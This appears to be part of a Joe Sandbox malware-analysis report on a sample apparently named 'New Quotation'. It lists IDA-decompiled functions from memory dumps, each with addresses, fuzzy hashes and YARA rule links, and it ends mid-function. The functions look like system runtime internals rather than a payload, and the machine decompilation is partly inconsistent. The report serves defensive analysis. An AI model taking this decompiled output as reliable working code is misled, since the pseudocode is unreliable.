                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4F1D Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E1D8A4F1D(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1d8cb370 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E1D7E3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                                                                          0x1d8a4f1d
                                                                                                                                                                                          0x1d8a4f2c
                                                                                                                                                                                          0x1d8a4f34
                                                                                                                                                                                          0x1d8a4f37
                                                                                                                                                                                          0x1d8a4f3b
                                                                                                                                                                                          0x1d8a4f45
                                                                                                                                                                                          0x1d8a4f57
                                                                                                                                                                                          0x1d8a4f47
                                                                                                                                                                                          0x1d8a4f50
                                                                                                                                                                                          0x1d8a4f50
                                                                                                                                                                                          0x1d8a4f62
                                                                                                                                                                                          0x1d8a4f63
                                                                                                                                                                                          0x1d8a4f65
                                                                                                                                                                                          0x1d8a4f6a
                                                                                                                                                                                          0x1d8a4f7b

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f192dafe1dcb38b5255fa69ea16f82cecbacb38bca677b427b98dc0cf26c10a8
                                                                                                                                                                                          • Instruction ID: e11e4eb486fc710e0f37c71b097efec020a39172fd5967054553366bfe4724fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: f192dafe1dcb38b5255fa69ea16f82cecbacb38bca677b427b98dc0cf26c10a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0B474A04248DFDB04DBBCD545B5DB7F8EF08704F018099F515EB290DA34E900C715
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80CEA0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D80CEA0(signed int _a4, intOrPtr _a8) {
				char* _t12;
				intOrPtr _t19;

				_t19 = _a8;
				if(E1D7E3C40() != 0) {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t12 = 0x7ffe0386;
				}
				if( *_t12 != 0) {
					E1D8A4B67( *((intOrPtr*)(_t19 - 0x1c)), _t19,  *((intOrPtr*)(_t19 - 0x48)),  *((intOrPtr*)(_t19 - 0x44)),  *((intOrPtr*)(_t19 - 0x3c)));
				}
				return E1D7D5622(_a4, _t19 - 0x78, 0x102);
			}





                                                                                                                                                                                          0x1d80cea7
                                                                                                                                                                                          0x1d80ceb1
                                                                                                                                                                                          0x1d84892a
                                                                                                                                                                                          0x1d80ceb7
                                                                                                                                                                                          0x1d80ceb7
                                                                                                                                                                                          0x1d80ceb7
                                                                                                                                                                                          0x1d80cebf
                                                                                                                                                                                          0x1d848942
                                                                                                                                                                                          0x1d848942
                                                                                                                                                                                          0x1d80ced8

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: ca0abb894f7510a6b357e4a83ede505299fed7691ba1db346d194fdca9d1db46
                                                                                                                                                                                          • Instruction ID: f1cee7c14e10506736355a433abb4df5e4a58d70bea727b69de1ce3e3541a1d8
                                                                                                                                                                                          • Opcode Fuzzy Hash: ca0abb894f7510a6b357e4a83ede505299fed7691ba1db346d194fdca9d1db46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F0E23620824AABC7028A99E804E5EFF2AEF80B60F158012FA144B260D731BC61C712
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4E03 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E1D8A4E03(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1d8cb370 ^ _t26;
				_v20 = __ecx;
				_v46 = 0x1c28;
				_v16 = __edx;
				if(E1D7E3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                                                                          0x1d8a4e03
                                                                                                                                                                                          0x1d8a4e12
                                                                                                                                                                                          0x1d8a4e1a
                                                                                                                                                                                          0x1d8a4e1d
                                                                                                                                                                                          0x1d8a4e21
                                                                                                                                                                                          0x1d8a4e2b
                                                                                                                                                                                          0x1d8a4e3d
                                                                                                                                                                                          0x1d8a4e2d
                                                                                                                                                                                          0x1d8a4e36
                                                                                                                                                                                          0x1d8a4e36
                                                                                                                                                                                          0x1d8a4e48
                                                                                                                                                                                          0x1d8a4e49
                                                                                                                                                                                          0x1d8a4e4b
                                                                                                                                                                                          0x1d8a4e50
                                                                                                                                                                                          0x1d8a4e61

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: bfea916fa22d005dee3bfe10eb057097896dcad94a4f8405843e3774d9763e92
                                                                                                                                                                                          • Instruction ID: 94bf032a43b5452fb22ce1d7322a379f73b846d9b373d862ea890c2c95152629
                                                                                                                                                                                          • Opcode Fuzzy Hash: bfea916fa22d005dee3bfe10eb057097896dcad94a4f8405843e3774d9763e92
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1F0BEB4A04208EFDB04DBBCD545E6EB3F8BF08704F414499B611EB290EA34E900CB15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4E62 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E1D8A4E62(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1d8cb370 ^ _t26;
				_v20 = __ecx;
				_v46 = 0x1c27;
				_v16 = __edx;
				if(E1D7E3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                                                                          0x1d8a4e62
                                                                                                                                                                                          0x1d8a4e71
                                                                                                                                                                                          0x1d8a4e79
                                                                                                                                                                                          0x1d8a4e7c
                                                                                                                                                                                          0x1d8a4e80
                                                                                                                                                                                          0x1d8a4e8a
                                                                                                                                                                                          0x1d8a4e9c
                                                                                                                                                                                          0x1d8a4e8c
                                                                                                                                                                                          0x1d8a4e95
                                                                                                                                                                                          0x1d8a4e95
                                                                                                                                                                                          0x1d8a4ea7
                                                                                                                                                                                          0x1d8a4ea8
                                                                                                                                                                                          0x1d8a4eaa
                                                                                                                                                                                          0x1d8a4eaf
                                                                                                                                                                                          0x1d8a4ec0

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2debf46fb9c862fb66bac06e7c2e3f2e7b91fb5ba69f300390e5a34651c236c2
                                                                                                                                                                                          • Instruction ID: 05ed32e235c3a89684485592499d1efa8ab47e79db152c56a9cf82f4b7f6efa8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2debf46fb9c862fb66bac06e7c2e3f2e7b91fb5ba69f300390e5a34651c236c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F09AB4A14208EFDB04DBACD545A6EB3B8AF08704F0144A9B501EB291EA34E900CB15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4DA7 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                                                                          			E1D8A4DA7(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1d8cb370 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c25;
				if(E1D7E3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push("true");
				_push(0x20402);
				_push( *_t11 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                                                          0x1d8a4db6
                                                                                                                                                                                          0x1d8a4dbe
                                                                                                                                                                                          0x1d8a4dc1
                                                                                                                                                                                          0x1d8a4dcc
                                                                                                                                                                                          0x1d8a4dde
                                                                                                                                                                                          0x1d8a4dce
                                                                                                                                                                                          0x1d8a4dd7
                                                                                                                                                                                          0x1d8a4dd7
                                                                                                                                                                                          0x1d8a4de9
                                                                                                                                                                                          0x1d8a4dea
                                                                                                                                                                                          0x1d8a4dec
                                                                                                                                                                                          0x1d8a4df1
                                                                                                                                                                                          0x1d8a4e02

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 49ea33fc4bd9c57a97e85db21939a202aa5e179e607f8a79a87d31964752f0ed
                                                                                                                                                                                          • Instruction ID: a81fc894c6301d324fdc879e58cd11cc93e94abd8cdea77482d4ad4348bce5f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49ea33fc4bd9c57a97e85db21939a202aa5e179e607f8a79a87d31964752f0ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F05EB4A14218AFDB04DBACD946B6EB3B8AF04604F010499B605EB291EA74E900C755
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4D4B Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                                                                          			E1D8A4D4B(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1d8cb370 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E1D7E3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push("true");
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                                                          0x1d8a4d5a
                                                                                                                                                                                          0x1d8a4d62
                                                                                                                                                                                          0x1d8a4d65
                                                                                                                                                                                          0x1d8a4d70
                                                                                                                                                                                          0x1d8a4d82
                                                                                                                                                                                          0x1d8a4d72
                                                                                                                                                                                          0x1d8a4d7b
                                                                                                                                                                                          0x1d8a4d7b
                                                                                                                                                                                          0x1d8a4d8d
                                                                                                                                                                                          0x1d8a4d8e
                                                                                                                                                                                          0x1d8a4d90
                                                                                                                                                                                          0x1d8a4d95
                                                                                                                                                                                          0x1d8a4da6

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3767b3fe0c258ab0879876f9cc7a044eaf7a017aa76f022fecf3bfe58edc681e
                                                                                                                                                                                          • Instruction ID: 6641d463f8a663d8d41fa01f1fbb1cf88b0bd2c411db767fa4f0b056b6e9a3be
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3767b3fe0c258ab0879876f9cc7a044eaf7a017aa76f022fecf3bfe58edc681e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF05EB4A14258AFDB04DBACD945F6EB3B8AF04708F010499B601EB2D0EA74E900C755
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84CCF0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                          			E1D84CCF0(signed int _a4) {
				signed int _v12;
				signed int _v16;
				void* _t15;
				signed int _t17;

				_v16 = _v16 & 0x00000000;
				_t12 = _a4;
				_push(0x18);
				_push((_t17 & 0xfffffff8) - 0x18);
				_push(0x20);
				_push(0xfffffffe);
				_v12 = _a4;
				_t15 = E1D812A60();
				if(_t15 >= 0) {
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t12);
				}
				return _t15;
			}







                                                                                                                                                                                          0x1d84ccfb
                                                                                                                                                                                          0x1d84cd05
                                                                                                                                                                                          0x1d84cd08
                                                                                                                                                                                          0x1d84cd0a
                                                                                                                                                                                          0x1d84cd0b
                                                                                                                                                                                          0x1d84cd0d
                                                                                                                                                                                          0x1d84cd0f
                                                                                                                                                                                          0x1d84cd18
                                                                                                                                                                                          0x1d84cd1c
                                                                                                                                                                                          0x1d84cd2b
                                                                                                                                                                                          0x1d84cd2b
                                                                                                                                                                                          0x1d84cd37

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
                                                                                                                                                                                          • Instruction ID: 7d1139982f841838c4b41f5a04a946eabe6c96ca9e4f4a5012ac157bfc158dd6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
                                                                                                                                                                                          • Instruction Fuzzy Hash: F2F0E53355461467C230AA0D8C05F5BBBACDBD4B70F20431ABA649B1E0DA70EA01C7E6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4FFF Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                                                                          			E1D8A4FFF(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1d8cb370 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2e;
				if(E1D7E3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push("true");
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                                                          0x1d8a500e
                                                                                                                                                                                          0x1d8a5016
                                                                                                                                                                                          0x1d8a5019
                                                                                                                                                                                          0x1d8a5024
                                                                                                                                                                                          0x1d8a5036
                                                                                                                                                                                          0x1d8a5026
                                                                                                                                                                                          0x1d8a502f
                                                                                                                                                                                          0x1d8a502f
                                                                                                                                                                                          0x1d8a5041
                                                                                                                                                                                          0x1d8a5042
                                                                                                                                                                                          0x1d8a5044
                                                                                                                                                                                          0x1d8a5049
                                                                                                                                                                                          0x1d8a505a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 65c8b07b96cacc7b0821e0cb22b7c31ed165d8729d5d3e139f246427f5d70eed
                                                                                                                                                                                          • Instruction ID: a587659c38ec03b861b56829c67501cd01d285270eac3a85015e30d0cebba3cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65c8b07b96cacc7b0821e0cb22b7c31ed165d8729d5d3e139f246427f5d70eed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF05EB4A04208AFDB04DBA9D546A9E77B8AF08744F510099F601AB290EA34E905C765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CBE60 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E1D7CBE60(signed int _a4) {
				void* __ebp;
				signed int _t9;
				signed int _t10;
				void* _t13;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					return E1D8A4A6D(_t13, _t14, _t17, _t18, _t19);
				}
				_t9 =  *( *[fs:0x30] + 0xc);
				if( *((char*)(_t9 + 0x28)) == 0) {
					_t10 = _t17 + 4;
					_t14 =  *_t10;
					 *_t10 = 1;
					if( *_t10 != 0) {
						goto L3;
					}
					_t9 = _t10 | 0xffffffff;
					asm("lock xadd [edx], eax");
					if(_t9 == 0) {
						return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)),  *0x1d8c6644, _t17);
					}
				}
				return _t9;
			}










                                                                                                                                                                                          0x1d7cbe68
                                                                                                                                                                                          0x1d7cbe6d
                                                                                                                                                                                          0x1d7cbe8e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cbe8e
                                                                                                                                                                                          0x1d7cbe75
                                                                                                                                                                                          0x1d7cbe7c
                                                                                                                                                                                          0x1d7cbe80
                                                                                                                                                                                          0x1d7cbe84
                                                                                                                                                                                          0x1d7cbe84
                                                                                                                                                                                          0x1d7cbe88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d297
                                                                                                                                                                                          0x1d82d29a
                                                                                                                                                                                          0x1d82d29e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d2b4
                                                                                                                                                                                          0x1d82d29e
                                                                                                                                                                                          0x1d7cbe96

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4849888250aa8e7ccb78a8ec24f99a31f15392637f890354238849d2874368da
                                                                                                                                                                                          • Instruction ID: 7a9161d3d20b464e3338da5c8668f9903fb5a7e519047883b3c4a14881d7293d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4849888250aa8e7ccb78a8ec24f99a31f15392637f890354238849d2874368da
                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F0BE319005828FC7168B28C940F76B765EB81B70F1A8269E6294B5A1DB20E840D7C2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4EC1 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                                                                          			E1D8A4EC1(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1d8cb370 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E1D7E3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                                                          0x1d8a4ed0
                                                                                                                                                                                          0x1d8a4ed8
                                                                                                                                                                                          0x1d8a4edb
                                                                                                                                                                                          0x1d8a4ee6
                                                                                                                                                                                          0x1d8a4ef8
                                                                                                                                                                                          0x1d8a4ee8
                                                                                                                                                                                          0x1d8a4ef1
                                                                                                                                                                                          0x1d8a4ef1
                                                                                                                                                                                          0x1d8a4f03
                                                                                                                                                                                          0x1d8a4f04
                                                                                                                                                                                          0x1d8a4f06
                                                                                                                                                                                          0x1d8a4f0b
                                                                                                                                                                                          0x1d8a4f1c

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 43495e6150c7fe1db6689391d0e94696e9face66dfe54afd8e1c66ddadd81df7
                                                                                                                                                                                          • Instruction ID: b12c70a8ad51f10cd375c7458ef43057f4f5350e8d658d1ebd51a46bb8b483e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43495e6150c7fe1db6689391d0e94696e9face66dfe54afd8e1c66ddadd81df7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11F05EB4A04288AFDB04DBACD545E9E77B8EF08614F510499B512EB2D0DA74E904C715
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C8DCD Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E1D7C8DCD(signed int __ecx) {
				signed int _t14;
				signed int _t17;

				_t14 = __ecx;
				_t17 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
					_push(0);
					_push( *((intOrPtr*)(__ecx + 0x24)));
					E1D812A70();
				}
				if( *((intOrPtr*)(_t17 + 8)) != 0) {
					_push( *((intOrPtr*)(_t17 + 8)));
					E1D812A80();
				}
				asm("lock xadd [eax], ecx");
				if((_t14 | 0xffffffff) == 0) {
					E1D7C8C3D( *((intOrPtr*)(_t17 + 0x1c)));
				}
